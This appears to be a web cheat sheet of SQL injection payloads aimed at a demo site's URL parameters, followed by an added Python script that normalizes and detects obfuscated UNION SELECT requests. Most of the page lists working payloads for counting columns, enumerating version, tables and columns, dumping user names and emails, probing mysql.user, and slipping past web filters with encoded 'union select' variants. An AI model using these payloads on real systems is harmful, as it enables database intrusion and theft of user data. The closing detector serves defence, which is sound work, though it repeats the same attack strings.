SQLi Cheat Sheet
SQL Cheat Sheet
Below is a working list of SQL injection payloads and variables used to extract data from databases and the underlying system via the URL.
If you have anything you feel could be added to any of the lists, please write it in the comments and I'll update them accordingly.
Test number of Columns - Watch for Error
http://testphp.acunetix.com/artists.php?artist=1 order by 1,2,3,4
http://testphp.acunetix.com/artists.php?artist=1 order by 1,2,3,4 -- LIMIT 1
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 2/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 3/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 4/*
Test Injectable Columns - Watch for visual indicators (WAF Filters)
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1,2,3,4
http://testphp.acunetix.com/listproducts.php?cat=1 -1 /*!UNiOn*/ /*!SeLEct*/ 1,database(),3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20/**//*!12345UNION%20SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20%20/**//*!50000UNION%20SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20/**/UNION/**//*!50000SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20/*!50000UniON%20SeLeCt*/%201,database%28%29,3,4,5,6,7,8,9,10,11
See 'Web Filter Bypass 'union select' keyword strings' below for more.
Enumerate Information
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,@@version,3,4
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,hex(unhex(@@version)),3,4
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,convert(@@version using latin1),3,4
Enumerate Database
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,database(),3,4
Enumerate Tables
http://testphp.acunetix.com/listproducts.php?cat=1 -1 union all select 1,2,3,4,5,6,7,8,table_name,10,11 from information_schema.tables
Enumerate Columns
http://testphp.acunetix.com/artists.php?artist=1 -1 union select all 1,2,column_name,4 from information_schema.columns where table_schema='database' and table_name='table_name' LIMIT 1,1 -- - LIMIT 1
Enumerate Raw Data
http://testphp.acunetix.com/listproducts.php?cat=1 union select all 1,2,3,4,5,6,group_concat(uname,0x10a,email),8,9,10,11 FROM users
Confirm MySQL version - if the page returns true, the value at the end of the query (4 or 5) is the major version
http://testphp.acunetix.com/listproducts.php?cat=1 and substring(@@version,1,1)=4
http://testphp.acunetix.com/listproducts.php?cat=1 and substring(@@version,1,1)=5
Test if subselects work - if the page returns true then subselects work
http://testphp.acunetix.com/listproducts.php?cat=1 and (select 1)=1
If subselects work, test for access to mysql.user - if the page returns true then it works
http://testphp.acunetix.com/listproducts.php?cat=1 and (select 1 from mysql.user limit 0,1)=1
Injection - values to substitute into an injectable column
@@hostname
@@tmpdir
@@datadir
@@basedir
@@log
@@log_bin
@@log_error
@@binlog_format
@@time_format
@@date_format
@@ft_boolean_syntax
@@innodb_log_group_home_dir
@@new
@@version
@@version_comment
@@version_compile_os
@@version_compile_machine
@@GLOBAL.have_symlink
@@GLOBAL.have_ssl
@@GLOBAL.VERSION
version()
table_name()
user()
system_user()
session_user()
database()
column_name()
collation(user())
collation(\N)
schema()
UUID()
current_user()
current_user
dayname(from_days(401))
dayname(from_days(402))
dayname(from_days(403))
dayname(from_days(404))
dayname(from_days(405))
dayname(from_days(406))
dayname(from_days(407))
monthname(from_days(690))
monthname(from_unixtime(1))
collation(convert((1)using/**/koi8r))
(select(collation_name)from(information_schema.collations)where(id)=1)
(select(collation_name)from(information_schema.collations)where(id)=23)
(select(collation_name)from(information_schema.collations)where(id)=36)
(select(collation_name)from(information_schema.collations)where(id)=48)
(select(collation_name)from(information_schema.collations)where(id)=50)
Adding Gaps Between requests
Result        Separator   Hex
testtest      nospace     0x1a
test*test     *           0x2a
test:test     :           0x3a
test::test    ::          0x3a3a
testJtest     J           0x4a
testZtest     Z           0x5a
testjtest     j           0x6a
testztest     z           0x7a
testtest      nospace     0x8a
testtest      nospace     0x9a
test test     SPACE       0x10a
Web Filter Bypass 'union select' keyword strings
union select
/*!UNiOn*/ /*!SeLEct*/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*--*/union/*--*/select/*--*/
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
+UnIOn%0D%0ASeleCt%0D%0A
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
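As an added defensive example (not part of the original post), the following normalizer undoes the tricks the bypass list above relies on (MySQL `/*!50000 ... */` conditional comments, `/**/` and `#`/`--` comments, mixed case, single and double URL-encoding, `%0D%0A` line breaks) so that one plain `union select` signature matches the obfuscated forms. The request strings are constructed here, modelled on the payloads on this page, and the `detect` function is an assumption of how such a check would be wired into log review.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not from any real log); the payload
# shapes mirror the 'union select' bypass strings listed on this page.
SAMPLE_REQUESTS = [
    "/artists.php?artist=1",
    "/listproducts.php?cat=1 -1 /*!UNiOn*/ /*!SeLEct*/ 1,database(),3,4",
    "/listproducts.php?cat=1%20%20-1%20%20%20/**//*!12345UNION%20SELECT*//**/%201,database%28%29,3",
    "/listproducts.php?cat=1%20union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1,2",
    "/listproducts.php?cat=1+/*!u%6eion*/+/*!se%6cect*/+1,2",
    "/listproducts.php?cat=1+union+distinctROW+select+1,2",
    "/search.php?q=union+station+select+few",   # benign: words between the keywords
]

# Signature applied after normalization: UNION [ALL|DISTINCT|DISTINCTROW] SELECT
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct(?:row)?\s+)?select\b")


def normalize(raw: str) -> str:
    """Rewrite a request the way MySQL's lexer would see it: decode, strip comments, fold case."""
    s = raw
    for _ in range(2):                      # second pass catches double URL-encoding (%2520)
        s = unquote_plus(s)
    # /*!50000UNION*/ is a conditional comment: MySQL executes its body, so keep the body
    s = re.sub(r"/\*!\d*", " ", s)
    # ordinary /* ... */ comments (including /**/ and /*--*/) behave as whitespace
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"\*/", " ", s)              # closer left over from a conditional comment
    # '#' and '--' comments run to the end of the line, so union#foo\r\nselect is union select
    s = re.sub(r"(?:#|--)[^\r\n]*", " ", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def detect(requests):
    """Return (raw_request, normalized_form) for every request carrying a UNION SELECT."""
    hits = []
    for req in requests:
        norm = normalize(req)
        if UNION_SELECT.search(norm):
            hits.append((req, norm))
    return hits


if __name__ == "__main__":
    for raw, norm in detect(SAMPLE_REQUESTS):
        print(f"UNION SELECT after normalization: {norm!r}\n    from {raw!r}")
```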